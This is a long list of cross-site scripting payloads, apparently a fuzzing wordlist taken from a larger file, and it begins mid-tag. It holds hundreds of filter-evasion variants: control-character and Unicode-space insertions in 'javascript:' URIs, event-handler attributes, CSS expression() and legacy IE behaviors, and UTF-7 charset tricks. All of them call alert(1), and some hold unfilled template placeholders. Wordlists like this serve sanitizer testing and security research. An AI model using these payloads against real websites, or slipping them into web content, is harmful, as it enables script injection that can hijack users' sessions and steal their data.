id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> 
+"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input 
onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html 
onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee 
onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body 
onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> 
